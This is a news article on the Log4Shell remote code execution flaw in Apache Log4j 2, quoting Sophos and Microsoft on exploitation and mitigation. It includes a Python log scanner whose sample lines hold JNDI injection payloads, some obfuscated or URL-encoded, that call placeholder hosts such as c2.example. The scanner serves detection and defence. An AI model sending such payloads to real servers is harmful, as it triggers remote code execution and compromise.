Log4Shell arrives just in time to ruin the holidays

The security community has been abuzz all weekend over the discovery of a remote code execution vulnerability in Apache Log4j 2, dubbed Log4Shell.

The vulnerability abuses the way data is written to a server’s logfile. As Sophos explains, an attacker could trick the server into downloading a malicious payload by feeding the logfile a Java programme which it assumes it needs to run in order to generate the file.

“The trick is that, by default, unpatched versions of the Log4j library permit logging requests to trigger general-purpose LDAP (directory services) searches, as well as various other online lookups,” explains Sophos.

Essentially, a clever bit of trickery could see Log4j interpret a logged message as a URL, fetch that URL and, if a payload is waiting there, execute it without raising any error.

Why does this feature exist? Well, for one, it allows you to log in using an email address or a username rather than an incoherent string of letters and numbers.

The problem is that this vulnerability could allow an attacker to access a server without the need for a password or access token.

The big problem here is that Log4Shell was publicly detailed before a patch could be sent out.

“At the time of publication, the vast majority of observed activity has been scanning, but exploitation and post-exploitation activities have also been observed. Based on the nature of the vulnerability, once the attacker has full access and control of an application, they can perform a myriad of objectives. Microsoft has observed activities including installing coin miners, Cobalt Strike to enable credential theft and lateral movement, and exfiltrating data from compromised systems,” Microsoft Threat Intelligence Center wrote in a blog post.

This is a very big issue, and the advice for now is to upgrade to Apache Log4j 2.15.0 and block JNDI from making requests to untrusted servers. For end users, there’s not much you can do besides wait for a fix.

Microsoft also says that firms shouldn’t focus solely on blocking requests: given how long this vulnerability has been in the wild, it’s likely that a breach has already taken place.

“Due to the broad network exploitation nature of vectors through which this vulnerability can be exploited and the fact that applying mitigations holistically across large environments will take time, we encourage defenders to look for signs of post-exploitation rather than fully relying on prevention. Observed post exploitation activity such as coin mining, lateral movement, and Cobalt Strike are detected with behavior-based detections,” says Microsoft.
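As an added example of the kind of log check Microsoft’s advice implies (this is not code from the article, Sophos or Microsoft), the script below URL-decodes each line and flattens the nested lookup tricks used to disguise the `${jndi:` string, then reports which source address sent a lookup and over which protocol. The log lines are constructed samples in a generic access-log shape; every hostname in them is a placeholder.

```python
import re
from urllib.parse import unquote

# Constructed sample log lines (not real traffic): source IP first, user agent last.
SAMPLE_LINES = [
    '10.0.0.5 - - "GET / HTTP/1.1" 200 "Mozilla/5.0"',
    '10.0.0.9 - - "GET / HTTP/1.1" 200 "${jndi:ldap://lookup-host.example/a}"',
    '10.0.0.9 - - "GET /?x=%24%7Bjndi%3Adns%3A%2F%2Fprobe.example%7D HTTP/1.1" 404 "-"',
    '10.0.0.7 - - "GET / HTTP/1.1" 200 "${${lower:j}${upper:n}di:rmi://c2.example/x}"',
    '10.0.0.8 - - "GET / HTTP/1.1" 200 "${env:HOME}"',
]

# Inner lookups that resolve to a literal: ${lower:x}, ${upper:x} and the
# default-value form ${anything:-x}. Collapsing them exposes the real lookup.
INNER = re.compile(r"\$\{(?:lower|upper):([^${}]*)\}|\$\{[^${}]*:-([^${}]*)\}", re.I)
JNDI = re.compile(r"\$\{\s*jndi\s*:\s*([a-z]+)\s*:", re.I)


def normalise(text):
    """Undo (possibly repeated) URL encoding, then flatten nested lookups."""
    for _ in range(3):
        decoded = unquote(text)
        if decoded == text:
            break
        text = decoded
    while True:
        flat = INNER.sub(lambda m: m.group(1) if m.group(1) is not None else m.group(2), text)
        if flat == text:
            return text
        text = flat


def scan_line(line):
    """Return (jndi scheme, normalised line) when a JNDI lookup is present, else None."""
    norm = normalise(line)
    match = JNDI.search(norm)
    return (match.group(1).lower(), norm) if match else None


def scan_log(lines):
    """Collect one record per line that carries a JNDI lookup."""
    hits = []
    for line in lines:
        result = scan_line(line)
        if result:
            hits.append({"src": line.split(" ", 1)[0], "scheme": result[0], "normalised": result[1]})
    return hits


if __name__ == "__main__":
    for hit in scan_log(SAMPLE_LINES):
        print(hit["src"], hit["scheme"], hit["normalised"])
```

Lines that merely use other lookups, such as `${env:HOME}`, are not reported, so the output lists only entries worth following up with the behaviour-based checks Microsoft describes.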

Our hearts go out to the security teams which need to address this matter after a long year fighting ne’er-do-wells online.

[Image – CC 0 Pixabay]
